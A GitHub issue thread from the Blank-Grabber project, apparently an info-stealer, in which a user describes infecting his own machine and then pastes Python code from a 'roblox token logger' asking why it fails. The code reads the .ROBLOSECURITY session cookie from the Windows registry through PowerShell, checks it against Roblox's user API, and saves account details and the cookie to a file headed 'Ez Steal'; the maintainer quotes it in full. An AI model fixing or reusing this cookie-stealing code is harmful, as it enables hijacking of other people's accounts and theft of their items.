### ISSUE TITLE
I need an answer

### ISSUE THREAD

**Issue by Fr0go1** [Blank-c/Blank-Grabber#174]
Is it bad that i ran the script on my pc without a VM?

**Comment by Fr0go1** [comment]
how do i make it not run on startup?

**Comment by Fr0go1** [comment]
now discord doesnt work

**Comment by Fr0go1** [comment]
im a idiot

**Comment by Blank-c** [comment]
not sure what you mean. Can you explain?

**Comment by Blank-c** [comment]
The script is safe (knowing that you build it).
Check the end of the readme to remove the grabber (from startup too).

**Comment by Fr0go1** [comment]
ok thanks

**Comment by Fr0go1** [comment]
i needed to reinstall discord because it kept popping up with a js error when i tryed to run it

**Comment by Fr0go1** [comment]
i also want help with this, i skimmed though the code for a roblox token logger this was the code i found and am trying to get working but it only prints 2,4,3 in that order

`import subprocess
import re
import os
import json

class utils:
    def robloxStealer(self, cookies= []) -> None:
        robloxcookies = list()
        def check(cookie):
            headers = {'Cookie' : '.ROBLOSECURITY=' + cookie}
            try:
                r = json.loads(self.http.request('GET', 'https://www.roblox.com/mobileapi/userinfo', headers= headers).data.decode())
            except json.JSONDecodeError:
                return
            data = f'Username: {r["UserName"]}\nUserID: {r["UserID"]}\nRobux: {r["RobuxBalance"]}\nBuilders Club Member: {r["IsAnyBuildersClubMember"]}\nPremium: {r["IsPremium"]}\nThumbnail: {r["ThumbnailUrl"]}\n\nCookie: {cookie}'
            robloxcookies.append(data)

        print("4")
        temp = ['\n'.join(cookies)]
        for i in ('HKCU', 'HKLM'):
            rbxcmd = subprocess.run(f'powershell Get-ItemPropertyValue -Path {i}:SOFTWARE\\Roblox\\RobloxStudioBrowser\\roblox.com -Name .ROBLOSECURITY', capture_output= True, shell= True)
            if not rbxcmd.returncode:
                temp.append(rbxcmd.stdout.decode(errors= 'backslashescape'))
        for i in temp:
            for j in re.findall(r'_\|WARNING:-DO-NOT-SHARE-THIS.--Sharing-this-will-allow-someone-to-log-in-as-you-and-to-steal-your-ROBUX-and-items\.\|_[A-Z0-9]+', i):
                check(j)
        print("3")
        if robloxcookies:
            print("5")
            division = '\n\n' + 'Ez Steal'.center(50, '=') + '\n\n'
            filename = "Roblox Cookies.txt"
            file_path = os.path.join(os.getcwd(), filename)
            print("1")
            with open(file_path, 'w', encoding= 'utf-8', errors= 'ignore') as file:
                file.write((division).join(robloxcookies))
                file.flush()  # make sure that data is written to the file
            file.close()  # close the file properly
            self.collection['Roblox Cookies'] += len(robloxcookies)


print("2")
# instantiate object of class 'utils'
utils_obj = utils()

# call the 'robloxStealer' method on the object
utils_obj.robloxStealer()`

**Comment by Blank-c** [comment]
> i also want help with this, i skimmed though the code for a roblox token logger this was the code i found and am trying to get working but it only prints 2,4,3 in that order
> 
> `import subprocess import re import os import json
> 
> class utils: def robloxStealer(self, cookies= []) -> None: robloxcookies = list() def check(cookie): headers = {'Cookie' : '.ROBLOSECURITY=' + cookie} try: r = json.loads(self.http.request('GET', 'https://www.roblox.com/mobileapi/userinfo', headers= headers).data.decode()) except json.JSONDecodeError: return data = f'Username: {r["UserName"]}\nUserID: {r["UserID"]}\nRobux: {r["RobuxBalance"]}\nBuilders Club Member: {r["IsAnyBuildersClubMember"]}\nPremium: {r["IsPremium"]}\nThumbnail: {r["ThumbnailUrl"]}\n\nCookie: {cookie}' robloxcookies.append(data)
> 
> ```
>     print("4")
>     temp = ['\n'.join(cookies)]
>     for i in ('HKCU', 'HKLM'):
>         rbxcmd = subprocess.run(f'powershell Get-ItemPropertyValue -Path {i}:SOFTWARE\\Roblox\\RobloxStudioBrowser\\roblox.com -Name .ROBLOSECURITY', capture_output= True, shell= True)
>         if not rbxcmd.returncode:
>             temp.append(rbxcmd.stdout.decode(errors= 'backslashescape'))
>     for i in temp:
>         for j in re.findall(r'_\|WARNING:-DO-NOT-SHARE-THIS.--Sharing-this-will-allow-someone-to-log-in-as-you-and-to-steal-your-ROBUX-and-items\.\|_[A-Z0-9]+', i):
>             check(j)
>     print("3")
>     if robloxcookies:
>         print("5")
>         division = '\n\n' + 'Ez Steal'.center(50, '=') + '\n\n'
>         filename = "Roblox Cookies.txt"
>         file_path = os.path.join(os.getcwd(), filename)
>         print("1")
>         with open(file_path, 'w', encoding= 'utf-8', errors= 'ignore') as file:
>             file.write((division).join(robloxcookies))
>             file.flush()  # make sure that data is written to the file
>         file.close()  # close the file properly
>         self.collection['Roblox Cookies'] += len(robloxcookies)
> ```
> 
> print("2")
> 
> # instantiate object of class 'utils'
> utils_obj = utils()
> 
> # call the 'robloxStealer' method on the object
> utils_obj.robloxStealer()`

I didn't understand what you said and what help you want from me. Please elaborate your question.
